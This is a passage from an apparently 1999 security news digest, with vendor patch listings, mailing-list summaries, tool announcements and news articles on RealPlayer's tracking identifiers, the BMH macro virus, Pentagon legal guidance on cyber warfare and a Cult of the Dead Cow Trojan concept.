fixed shareware version will be available soon. 2. Vendor: DataTel Product: Interscan VirusWall Patch Location: http://www.beavuh.org/exploits/V323PTCH.COM Vulnerability Patched: InterScan VirusWall Long HELO Buffer Overflow Vulnerability BugTraq ID: 787 Relevant URLS: http://www.securityfocus.com/bid/787 Note: The patch was not provided by DataTel. It was a temporary fix supplied by "Beavuh". 3. Vendor: Microsoft Product: Windows 95/98 Patch Location: Windows 95: http://download.microsoft.com/download/win95/update/245729/w95/en-us/245729us5.exe Windows 98: http://download.microsoft.com/download/win98/update/245729/w98/en-us/245729us8.exe Vulnerability Patched: Windows 95/98 UNC Buffer Overflow Vulnerability BugTraq ID: 792 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/792 4. Vendor: ISC Product: BIND Patch Location: (OS specific patches available to us as of Nov 14) Caldera ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current MD5s db1dda05dbe0f67c2bd2e5049096b42c RPMS/bind-8.2.2p3-1.i386.rpm 82bbe025ac091831904c71c885071db1 RPMS/bind-doc-8.2.2p3-1.i386.rpm 2f9a30444046af551eafd8e6238a50c6 RPMS/bind-utils-8.2.2p3-1.i386.rpm 0e4f041549bdd798cb505c82a8911198 SRPMS/bind-8.2.2p3-1.src.rpm Red Hat Linux 4.x: Intel: ftp://updates.redhat.com/4.2/i386/bind-8.2.2_P3-0.4.2.i386.rpm ftp://updates.redhat.com/4.2/i386/bind-devel-8.2.2_P3-0.4.2.i386.rpm ftp://updates.redhat.com/4.2/i386/bind-utils-8.2.2_P3-0.4.2.i386.rpm Alpha: ftp://updates.redhat.com/4.2/alpha/bind-8.2.2_P3-0.4.2.alpha.rpm ftp://updates.redhat.com/4.2/alpha/bind-devel-8.2.2_P3-0.4.2.alpha.rpm ftp://updates.redhat.com/4.2/alpha/bind-utils-8.2.2_P3-0.4.2.alpha.rpm Sparc: ftp://updates.redhat.com/4.2/sparc/bind-8.2.2_P3-0.4.2.sparc.rpm ftp://updates.redhat.com/4.2/sparc/bind-devel-8.2.2_P3-0.4.2.sparc.rpm ftp://updates.redhat.com/4.2/sparc/bind-utils-8.2.2_P3-0.4.2.sparc.rpm Source packages: ftp://updates.redhat.com/4.2/SRPMS/bind-8.2.2_P3-0.4.2.src.rpm Red Hat Linux 5.x: Intel: ftp://updates.redhat.com/5.2/i386/bind-8.2.2_P3-0.5.2.i386.rpm ftp://updates.redhat.com/5.2/i386/bind-devel-8.2.2_P3-0.5.2.i386.rpm ftp://updates.redhat.com/5.2/i386/bind-utils-8.2.2_P3-0.5.2.i386.rpm Alpha: ftp://updates.redhat.com/5.2/alpha/bind-8.2.2_P3-0.5.2.alpha.rpm ftp://updates.redhat.com/5.2/alpha/bind-devel-8.2.2_P3-0.5.2.alpha.rpm ftp://updates.redhat.com/5.2/alpha/bind-utils-8.2.2_P3-0.5.2.alpha.rpm Sparc: ftp://updates.redhat.com/5.2/sparc/bind-8.2.2_P3-0.5.2.sparc.rpm ftp://updates.redhat.com/5.2/sparc/bind-devel-8.2.2_P3-0.5.2.sparc.rpm ftp://updates.redhat.com/5.2/sparc/bind-utils-8.2.2_P3-0.5.2.sparc.rpm Source packages: ftp://updates.redhat.com/5.2/SRPMS/bind-8.2.2_P3-0.5.2.src.rpm Red Hat Linux 6.x: Intel: ftp://updates.redhat.com/6.1/i386/bind-8.2.2_P3-1.i386.rpm ftp://updates.redhat.com/6.1/i386/bind-devel-8.2.2_P3-1.i386.rpm ftp://updates.redhat.com/6.1/i386/bind-utils-8.2.2_P3-1.i386.rpm Alpha: ftp://updates.redhat.com/6.0/alpha/bind-8.2.2_P3-1.alpha.rpm ftp://updates.redhat.com/6.0/alpha/bind-devel-8.2.2_P3-1.alpha.rpm ftp://updates.redhat.com/6.0/alpha/bind-utils-8.2.2_P3-1.alpha.rpm Sparc: ftp://updates.redhat.com/6.0/sparc/bind-8.2.2_P3-1.sparc.rpm ftp://updates.redhat.com/6.0/sparc/bind-devel-8.2.2_P3-1.sparc.rpm ftp://updates.redhat.com/6.0/sparc/bind-utils-8.2.2_P3-1.sparc.rpm Source packages: ftp://updates.redhat.com/6.1/SRPMS/bind-8.2.2_P3-1.src.rpm Vulnerability Patched: Multiple BIND Vulnerabilities BugTraq ID: 788 Relevant URLS: http://www.isc.org/products/BIND/bind-security-19991108.html http://www.securityfocus.com/bid/788 5. Vendor: Irfan Skiljan Product: IrfanView32 Patch Location: http://stud1.tuwien.ac.at/~e9227474/iview310.zip (version 3.1 or IrfanView32) Vulnerability Patched: IrfanView32 Image File Buffer Overflow Vulnerability BugTraq ID: 781 Relevant URLS: http://stud1.tuwien.ac.at/~e9227474/ http://www.securityfocus.com/bid/781 6. Vendor: Debian Product: GNU/Linux Patch Location: Source Packages: http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37-1slink.1.diff.gz http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37-1slink.1.dsc http://security.debian.org/dists/slink/updates/source/nfs-server_2.2beta37.orig.tar.gz Alpha: http://security.debian.org/dists/slink/updates/binary-alpha/nfs-server_2.2beta37-1slink.1_alpha.deb i386: http://security.debian.org/dists/slink/updates/binary-i386/nfs-server_2.2beta37-1slink.1_i386.deb m68k: http://security.debian.org/dists/slink/updates/binary-m68k/nfs-server_2.2beta37-1slink.1_m68k.deb Sparc: http://security.debian.org/dists/slink/updates/binary-sparc/nfs-server_2.2beta37-1slink.1_sparc.deb Vulnerability Patched: Linux nfsd Remote Buffer Overflow Vulnerability BugTraq ID: 782 Relevant URLS: http://www.securityfocus.com/bid/782 7. Vendor: Cobalt Networks Product: RaQ2 Patch Location: RaQ 3i (x86) RPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/rpms/cgiwrap-pacifica-3.6.4.C5.i386.rpm SRPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/srpms/cgiwrap-pacifica-3.6.4.C5.src.rpm RaQ 2 (MIPS) RPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/rpms/cgiwrap-raq2-3.6.4.C5.mips.rpm SRPM: ftp://ftp.cobaltnet.com/pub/experimental/secuirty/srpms/cgiwrap-raq2-3.6.4.C5.src.rpm Vulnerability Patched: Cobalt RaQ2 cgiwrap Vulnerability BugTraq ID: 777 Relevant URLS: http://www.securityfocus.com/bid/777 8. Vendor: Microsoft Product: Outlook Patch Locations: http://windowsupdate.microsoft.com http://www.microsoft.com/msdownload http://www.microsoft.com/msdownload/iebuild/ascontrol/en/ascontrol.htm Vulnerability Patched: MS ActiveX CAB File Execution Vulnerability BugTraq ID: 775 Relevant URLS: http://www.microsoft.com/security http://www.securityfocus.com/bid/775 9. Vendor: Immunix Product: StackGaurd Patch Locations: http://immunix.org/downloads.html (New version) Vulnerability Patched: Immunix StackGuard Evasion Vulnerability BugTraq ID: 786 Relevant URLS: http://www.immunix.org http://www.securityfocus.com/bid/786 10. Vendor: Ipswitch Product: IMail Patch Locations: ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe Vulnerability Patched: IMail POP3 Buffer Overflow Denial of Service Vulnerability BugTraq ID: 789 Relevant URLS: http://www.ipswitch.com http://www.securityfocus.com/bid/789 11. Vendor: Microsoft Product: Windows NT Patch Locations: X86: http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/NT4/EN-US/Q243649.exe Alpha: http://download.microsoft.com/download/winntsrv40/Patch/Spooler-fix/ALPHA/EN-US/Q243649.exe Vulnerabilities Patched: NT Spoolss.exe Buffer Overflow Vulnerabilities and NT Spoolss.exe DLL Insertion Vulnerability BugTraq ID: 768/769 Relevant URLS: http://www.microsoft.com/security http://www.securityficus.com/bid/768 http://www.securityfocus.com/bid/769 12. Vendor: Floosietek Product: FTGate Patch Location: http://www.floosietek.com/dl_ftg/download.htm (Download version 2.2) Vulnerability Patched: FTGate Directory Traversal Vulnerability BugTraq ID: 772 Relevant URLS: http://www.floosietek.com http://www.securityfocus.com/bid/772 13. Vendor: AN Product: AN HTTPD Patch Location: http://www.st.rim.or.jp/~nakata/ (version 1.21) Vulnerability Patched: AN-HTTPd CGI Vulnerabilities BugTraq ID: 762 Relevant URLS: http://www.securityfocus.com/bid/762 14. Vendor: IBM Product: HomePagePrint Patch Location: http://www.ibm.co.jp/software/internet/hpgprt/down2.html Vulnerability Patched: IBM HomePagePrint Buffer Overflow Vulnerability BugTraq ID: 763 Relevant URLS: http://www.securityfocus.com/bid/763 INCIDENTS SUMMARY 1999-11-02 to 1999-11-14 ------------------------------------------ 1. possible trojan/virus issue solved (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=382041CA.242F6E7D@netvision.net.il 2. port 109 (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=01BF2624.A77B0A40.cholet@logilune.com 3. Re: Logging hosts (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-1&msg=Pine.LNX.4.10.9911072300170.29394-100000@mad.unix.kg 4. Mail-relaying probing (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-8&msg=14375.58989.252415.240801@cap-ferrat.albourne.com V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-02 to 1999-11-14 ---------------------------------------------------------- 1. Re: FreeBSD listen() (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-1&msg=Pine.LNX.4.10.9911040724550.415-100000@mad.unix.kg 2. ssh-1.2.27 remote buffer overflow - exploitable (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=19991109014853.3239.qmail@securityfocus.com 3. Re: thttpd 2.04 stack overflow (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=199911100200.SAA05038@shell3.ba.best.com 4. MS Outlook javascript parsing bug (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=38285E28.CBB524CE@enternet.se 5. Re: Open Port on Win98 box (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=38299BCD.BE9B3E3A@thievco.com 6. minor (?) mc bug (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=Pine.LNX.4.10.9911102253410.3886-100000@pa16.suwalki.ppp.tpnet.pl 7. [Fwd: [Fwd: ICQ 2000 trojan/worm (VD#5)]] (Thread) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-8&msg=382DA20D.9338A51D@thievco.com VI. SECURITY JOBS SUMMARY 1999-11-02 to 1999-11-14 --------------------------------------------------- Seeking Staff: 1. Information Security Consultant(s) - #111 - NY Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=19991103184820.57.qmail@securityfocus.com 2. Information Security Analyst - #253 - NJ Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=19991103185247.280.qmail@securityfocus.com 3. Sr Firewall Engineer Position Reply to: Lora Reidmiller Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=3821B087.8ECC1A00@arlington.net 4. Sr. Mgr. Systems Security Reply to: Blomme, Sarah Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=8625681F.0077E21A.00@smtp2.mcld.net 5. Security Sales Nationwide Reply to: Erik Voss Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=017501bf270b$6774e1e0$6775010a@saratoga3 6. Sr. Mgr. Systems Security Reply to: Blomme, Sarah Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-1&msg=86256820.004BEF5A.00@smtp2.mcld.net 7. Software Engineer #4 - Atlanta, GA Reply to: Lori Sabat Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-8&msg=19991108194602.11673.qmail@securityfocus.com 8. Website password-protection scripts programmer needed Reply to: Katim S. Touray Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-8&msg=382A239F.5C32B0A8@fanafana.com VII. SECURITY SURVEY 1999-11-02 to 1999-11-14 ---------------------------------------------- The question for 1999-11-02 to 1999-11-14 was: Would you support a vendor that sued people who publicized bugs in their software? (Yes, this is happening!) Results: Yes 5% / 10 votes No 94% / 174 votes Total number of votes: 184 votes VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-02 to 1999-11-14 -------------------------------------------------------- 1. Security Focus Pager by Security Focus Relevant URL: http://www.securityfocus.com/pager This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 2. Snoot 1.3.1 by Martin Roesch (roesch@clark.net) < http://www.clark.net/~roesch/security.html > Platforms: FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OpenBSD and Solaris Snort is a libpcap-based packet sniffer/logger which can be used as a lightweight network intrusion detection system. It features rules based logging and can perform content searching/matching in addition to being used to detect a variety of other attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and much more. Snort has a real-time alerting capabilty, with alerts being sent to syslog, a seperate "alert" file, or even to a Windows computer via Samba. 3. BUGS 2.0.1 by Sylvain Martinez < http://www.asi.fr/~martinez/crypto/bugs-2.0.1.tgz > Platforms: HP-UX, Linux, Solaris, SunOS, UNIX, Windows 2000, Windows 3.x, Windows 95/98 and Windows NT Strong private key cryptography algorithm and applications. Multiplateform (UNIX and Windows). Crypt/hide/key generator. Unlimited key length, source code available. 4. NSS Narr0w Security Scanner by Narrow NaRr0w@LeGiOn2000.cC < http://www.wiretrip.net/rfp/1/index.asp > Platforms: Perl (any system supporting perl) Narr0w Security Scanner checks for 153 remote vulnerabilities. Written in perl. 5. cgi-check99 v0.3 0.3 by deepquest < http://www.deepquest.pf > Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD, OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, VMS, Windows 2000, Windows 3.x, Windows 95/98, Windows CE and Windows NT This is one of the worlds most cross platform cgi scanners, running on 37 operating systems! Even Palmos soon! Will check for hundreds of common cgi and other remote issues. Plus it will report you the Bugtraq ID of some vulnerabilities. Get the rebol interpreter at http://www.rebol.com. 6. guard by ondrej suchy < http://www.penguin.cz/~ondrej/guard/ > Platforms: Linux Guard is more an early warning system than IDS. it scans system logs for signs of intrusion in real time. produces colored output on the tty, sends alerts and regular reports. database of suspicious strings included. IX. SPONSOR INFORMATION - ------------------------------------------ URL: http://www.ntobjectives.com NT OBJECTives, Inc. is a small company dedicated to building network security tools for the Windows NT platform. Our current line of tools is directed at security forensics. We base our designs around fast, visually intuitive interfaces with a sharp focus on making security analysis easy. This is the foundation of our tool line. Our goal is for each of our successive product builds to enhance previous capabilities so that you have a comprehensive set of tools at your disposal. We keep abreast of current trends, tools, and issues, so that we can bring you quality network tools X. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. @HWA 18.0 First RealJukebox Now RealPlayer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Last week it was discovered that RealNetworks software product RealJukebox transmitted a Global Unique Identifier that was used to track a users listening habits. Now it seems that RealPlayer, the companies streaming video player, also transmits a GUID. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_508000/508340.stm Wired http://www.wired.com/news/technology/0,1282,32350,00.html BBC; Sci/Tech New Real privacy flaw Over 12 million people use the software to listen to their CDs A new security flaw has been discovered in one of the most popular programs used to access music and video over the internet. Software experts say a privacy glitch in RealNetworks' RealPlayer program means it could secretly collect information about its millions of users. Earlier this week, RealNetworks apologised after it was revealed that its RealJukebox software suffered from a similar problem. It subsequently released issued a patch to remove a unique identification number from the software which tracks users' listening habits. 'Harder to fix' The US security expert who discovered the original flaw, Richard Smith, says the glitch is in RealPlayer could present a serious problem for the software company. "It's harder to fix because the player has been around for years," Mr Smith, former president of Phar Lap Software, was quoted as saying. RealNetworks controls around 85% of the streaming media market, with 69 million registered users of RealPlayer. RealNetworks has yet to comment on the reports.But industry insiders say it is planning to release a new version of the software without the unique identification number. Identifying users The identifier is known as a globally unique identifier, or GUID. It transmits information to the company's headquarters details about what music each customer listens to and how many songs are copied. In the case of RealNetworks, the information sent includes a serial number that could be used to identify an individual. One of RealPlayer's main rivals, Microsoft's Windows Media Player, also transmits an identifier. But the ID number cannot be linked to personal information as Microsoft does not require user registration. The nonprofit group that monitors and enforces the corporate privacy policies of its members, TRUSTe, is planning to investigate whether RealNetworks had broken its privacy promises and whether its previous statement, which TRUSTe had vetted, was adequate. Wired; Real Damage Control -- Again by Chris Oakes and Jennifer Sullivan 3:00 a.m. 6.Nov.1999 PST RealNetworks has issued another software update that addresses a privacy concern, this time in its popular RealPlayer software. The company posted a free beta of RealPlayer 7 on Monday, which it said no longer tracks personal user information. Last Monday, RealNetworks had plugged a related privacy glitch in its RealJukebox music software. The patch removed from its RealJukebox software a unique identification number, which tracks users' listening habits. Software analysis has shown that the same identifier is also transmitted by version 6 of the RealPlayer. The unique identification numbers could be tied to personal information that is collected by RealNetworks during user registration. RealNetworks claims that more than 85 million people use the RealPlayer. "It's harder for [RealNetworks] to fix [the RealPlayer problem], because the player has been around for years," said Richard Smith, who first pointed out the problem. "[Sites] are really using the [ID] numbers in a big way." Smith pointed out that the RealPlayers currently in use will continue to transmit IDs until users upgrade their software. Smith regularly monitors the behavior of Internet software for security and privacy flaws. The identifier is known as a globally unique identifier, or GUID, and is initiated during the RealPlayer registration process. The number is also transmitted when users access any site providing RealAudio or RealVideo streams. The RealJukebox update was issued to stop the software from transmitting detailed information about the user's behavior to RealNetworks servers. According to the company, GUIDs can no longer be associated with any personal information, such as name and email, provided during RealJukebox registration. The RealPlayer, however, doesn't appear to track specific user behavior as RealJukebox did. It is unclear how many versions of RealPlayer have transmitted the unique IDs. RealNetworks' competitors include Microsoft's Windows Media Player, which users have downloaded 40 million times. A spokesman for Microsoft confirmed that the Windows Media Player, like other players, also transmits an identifier. But since Microsoft does not require user registration, the ID number cannot be tied to personal information. "[The transmission of unique identifiers] shows there are all these ways you can leave these little digital fingerprints, and nobody has studied this in a systematic way," said Paul Schwartz, law professor at Brooklyn Law School and co-author of Data Privacy Law. "We have to figure out what are the privacy implications," he said. "It's a great illustration of how we just find these things out as we go along." @HWA 19.0 New Difficult To Kill Macro Virus Found ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nvirb A new macro virus known as BMH is proving difficult to kill say Ant-Virus vendors. BMH not only infects the normal template like most other Macro viruses but also creates and infects SNrml.dot which it places in the Word Startup folder. This activates the virus every time MS Word is launched. CNN http://www.cnn.com/TECH/computing/9911/05/word97.virus.idg/index.html New Word 97 macro virus discovered November 5, 1999 Web posted at: 9:52 a.m. EST (1452 GMT) by Matthew Nelson From... (IDG) -- A new macro-based virus has been discovered, and is being described as the virus "that will not die until you put a stake in its heart" by anti-virus vendor Aladdin Knowledge Systems. The latest macro virus to strike is a Microsoft Word 97 Macro virus called W97M.BMH, or simply BMH, which infects the global template or normal.dot of Word 97 and will infect every document opened or created on the infected system. This new virus is unique in that it not only infects the normal template but it creates a special file called SNrml.dot in the \Office\STARTUP directory. While macro viruses are fairly easy to create and more and more common, this one is different because the normal procedure for removing such viruses, cleaning the normal.dot file, does not work with BMH. This is because the virus continues to infect the system from the special SNrml.dot file, according to Eric Vasbinder, product marketing manager for Aladdin. "It won't die, it's the undead virus," Vasbinder said. "Most macro viruses tend to infect the normal.doc template only, but the BMH virus is unique in that it creates another .dot template and it saves it in the office start up directory." "As a result of that, even if you remove the virus from the normal.dot, it will come back. Every file that it's in the Office start up directory will be executed when Word starts up," Vasbinder added. "It will start up and reinfect the system once again." To remove the virus, it is necessary to remove both .dot files, Vasbinder said. Once the virus infects a system it will also set the macro virus warning system within Office to the lowest setting, enabling future virus infections. It will also alter the Word application so that when users try to activate features, a picture will be shown instead. "It prevents you from performing certain actions in Word. It will modify the word configuration files, so that certain menu options inside word are unavailable," Vasbinder said. "It will instead of activating that option, it will display a picture instead." No information was available regarding which functions were affected or what the picture was of, however. An Aladdin eSafe anti-virus user in the United States discovered the virus this week using the products "Macro Terminator" technology, which scans for unauthorized macro file actions, according to the company. Anti-virus users with heuristic scanning as part of their system will most likely already be protected, according to Aladdin, but users should always update their DAT files frequently. @HWA 20.0 Do the Laws of War Apply in Cyberspace? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Pentagon officials are worried how the laws of war apply in the electronic realm. The US feels that existing laws are adequate to control operations in this new theater and that practitioners of cyber war still need to worry about collateral damage to civilian systems. Officials have also warned about over reacting to attacks on US systems, stating that the intent or origin must first be clearly established before a counter cyber attack can be launched. (If anyone knows where to find the report mentioned in this article, "An Assessment of Legal Issues in Information Operations", I would like a copy.) Washington Post http://www.washingtonpost.com/wp-dyn/articles/A35345-1999Nov7.html Late Update 1100EST Several people where kind enough to send us the entire document as well as a link to a PDF version. (Warning, this is extremely dry reading.) An Assessment of Legal Issues in Information Operations http://www.terrorism.com/documents/dod-io-legal.pdf - via Terrorism Research Center Washington Post; Military Grappling With Rules for Cyber Warfare By Bradley Graham Washington Post Staff Writer Monday , November 8, 1999 ; A1 During last spring's conflict with Yugoslavia, the Pentagon considered hacking into Serbian computer networks to disrupt military operations and basic civilian services. But it refrained from doing so, according to senior defense officials, because of continuing uncertainties and limitations surrounding the emerging field of cyber warfare. "We went through the drill of figuring out how we would do some of these cyber things if we were to do them," said a senior military officer. "But we never went ahead with any." As computers revolutionize many aspects of life, military officials have stepped up development of cyber weapons and spoken ominously of their potential to change the nature of war. Instead of risking planes to bomb power grids, telephone exchanges or rail lines, for example, Pentagon planners envision soldiers at computer terminals silently invading foreign networks to shut down electrical facilities, interrupt phone service, crash trains and disrupt financial systems. But such attacks, officials say, pose nettlesome legal, ethical and practical problems. Midway through the war with Yugoslavia, the Defense Department's top legal office issued guidelines warning that misuse of cyber attacks could subject U.S. authorities to war crimes charges. It advised commanders to apply the same "law of war" principles to computer attack that they do to the use of bombs and missiles. These call for hitting targets that are of military necessity only, minimizing collateral damage and avoiding indiscriminate attacks. Defense officials said concern about legalities was only one of the reasons U.S. authorities resisted the temptation to, say, raid the bank accounts of Yugoslav President Slobodan Milosevic. Other reasons included the untested or embryonic state of the U.S. cyber arsenal and the rudimentary or decentralized nature of some Yugoslav systems, which officials said did not lend themselves to computer assault. U.S. forces did target some computers that controlled the Yugoslav air defense system, the officials said. But the attacks were launched from electronic jamming aircraft rather than over computer networks from ground-based U.S. keyboards. No plan for a cyber attack on Yugoslav computer networks ever reached the stage of a formal legal assessment, according to several defense officials familiar with the planning. And the 50 pages of guidelines, prepared by the Pentagon general counsel's office, were not drafted with the Yugoslav operation specifically in mind. But officials said the document, which has received little publicity, reflected the collective thinking of Defense Department lawyers about cyber warfare and marked the U.S. government's first formal attempt to set legal boundaries for the military's involvement in computer attack operations. It told commanders to remain wary of targeting institutions that are essentially civilian, such as banking systems, stock exchanges and universities, even though cyber weapons now may provide the ability to do so bloodlessly. In wartime, the document advised, computer attacks and other forms of what the military calls "information operations" should be conducted only by members of the armed forces, not civilian agents. It also stated that before launching any cyber assaults, commanders must carefully gauge potential damage beyond the intended target, much as the Pentagon now estimates the number of likely casualties from bomb attacks. While computer attacks may appear on the surface as a cleaner means of destroying targets – with less prospect for physical destruction or loss of life than dropping bombs – Pentagon officials say such views are deceiving. By penetrating computer systems that control the communications, transportation, energy and other basic services in a foreign country, cyber weapons can have serious cascading effects, disrupting not only military operations but civilian life, officials say. Other U.S. government agencies have sided with the Pentagon view that existing law and international accords are sufficient to govern information warfare. But Russia is challenging this view. Over the past year, Moscow has tried to gather support for a United Nations resolution calling for new international guidelines and the banning of particularly dangerous information weapons. In comments to the U.N. secretary general published last month, Russia warned that information operations "might lead to an escalation of the arms race." It said "contemporary international law has virtually no means of regulating the development and application of such a weapon." But the Russian initiative has drawn little backing. U.S. officials regard it as an attempt to forestall development of an area of weaponry in which Russia lags behind the United States. In a formal response rejecting the Russian proposal, the Clinton administration said any attempt now to draft overarching principles on information warfare would be premature. "First, you have extraordinary differences in the sophistication of various countries about this type of technology," said a State Department official involved in the issue. "Also, the technology changes so rapidly, which complicates efforts to try to define these things." Instead of turning cyber assaults into another arms control issue, the administration prefers to treat them internationally as essentially a law enforcement concern. U.S. officials have supported several efforts through the United Nations and other groups to facilitate international cooperation in tracking computer criminals and terrorists. For all the heightened attention to cyber warfare, defense specialists contend that there are large gaps between what the technology promises and what practitioners can deliver. "We certainly have some capabilities, but they aren't what I would call mature ones yet," a high-ranking U.S. military officer said. The full extent of the U.S. cyber arsenal is among the most tightly held national security secrets. But reports point to a broad range of weapons under development, including use of computer viruses or "logic bombs" to disrupt enemy networks, the feeding of false information to sow confusion and the morphing of video images onto foreign television stations to deceive. Last month, the Pentagon announced it was consolidating plans for offensive as well as defensive cyber operations under the four-star general who heads the U.S. Space Command in Colorado Springs. But complicating large-scale computer attacks is the need for an extraordinary amount of detailed intelligence about a target's hardware and software systems. Commanders must know not just where to strike but be able to anticipate all the repercussions of an attack, officials said. "A recurring theme in our discussions with military operators is, well, if we can drop a bomb on it, why can't we take it out by a computer network attack," said a senior Pentagon lawyer specializing in intelligence. "Well, you may be able to. However, you've got to go through a few hoops and make sure that when you're choosing an alternative method, you're still complying with the law of armed conflict and making sure collateral damage is limited." In their guidelines document, titled "An Assessment of International Legal Issues in Information Operations," the Pentagon's lawyers warned of such unintended effects of computer attacks as opening the floodgates of a dam, causing an oil refinery in a populated area to explode in flames or triggering the release of radioactivity. They also mentioned the possibility of computer attacks spilling over into neutral or friendly nations and noted the legal limits on deceptive actions. "It may seem attractive for a combatant vessel or aircraft to avoid being attacked by broadcasting the agreed identification signals for a medical vessel or aircraft, but such actions would be a war crime," said the document, which was first reported last week by defense analyst William M. Arkin in a column on The Washington Post's online service. "Similarly, it might be possible to use computer morphing techniques to create an image of the enemy's chief of state informing his troops that an armistice or cease-fire agreement had been signed. If false, this also would be a war crime." The document also addressed questions about whether the United States would be any more justified in using cyber weapons if a foreign adversary first hacked into U.S. computer networks. The answer: It depends on the extent of damage. One complicating factor, the defense lawyers wrote, is the difficulty of being certain about the real source and intent of some cyber attacks, whose origin can easily be disguised. In the case of Yugoslavia, U.S. military authorities were slow to put together a plan for conducting information operations. But one was eventually assembled and approved by the middle of the 78-day war, the high-ranking officer said. The plan involved many traditional information warfare elements – psychological operations, deception actions, electronic jamming of radar and radio signals – targeting not just Yugoslav military and police forces but Milosevic and his associates, the officer said. One tactic was to bombard the Yugoslav leadership with faxes and other forms of harassment. 21.0 cDc Has New Trojan Plans ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by EvilWench Plans are underway for the development of a new trojan by the Cult of Dead Cow. This will supposedly be done by modifying commercial Remote Access software that would be wholly invisible to anti-virus software, even to those that can detect Back Orifice. This was revealed by Sir Dystic of the Cult of the Dead Cow while speaking to UK firms in London. (Somehow we think that the author of this article completely misunderstood statements made by Sir Dystic.) ZD Net http://www.zdnet.co.uk/news/1999/44/ns-11255.html News burst: Back Orifice author reveals new Trojan technique Fri, 05 Nov 1999 14:15:00 GMT Will Knight The author of Back Orifice and a leading hacker at Cult of the Dead Cow has revealed plans to develop an ingenious new Trojan technique that has even got anti-virus experts impressed. "I have been working on turning any piece of commercial software that provides remote access to a computer into an executable," discloses Sir Dystic, one of the hacker group's more prominent members. "It wouldn't be very difficult to configure it so that it would work behind the scenes and then how would anti-virus software that scans for things like Back Orifice be able to detect it?" Sir Dystic made this revelation to ZDNet while visiting Britain to explain to concept of moral hacking to UK companies. "Full story to follow. " (unavailable at release time) @HWA 22.0 India Set To Vote on 'CyberLaw' Bill ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Deepquest The Information Technology Bill 1999 is set to be presented before India's Parliament at the end of November. The bill is said to facilitate electronic communication, trade, and commerce and prevent computer crime in the public and private sectors. C|Net http://news.cnet.com/news/0-1005-200-1429644.html?tag=st.ne.1005.thed.1005-200-1429644 India sends Net regulation bill to parliament By Reuters Special to CNET News.com November 4, 1999, 9:55 a.m. PT NEW 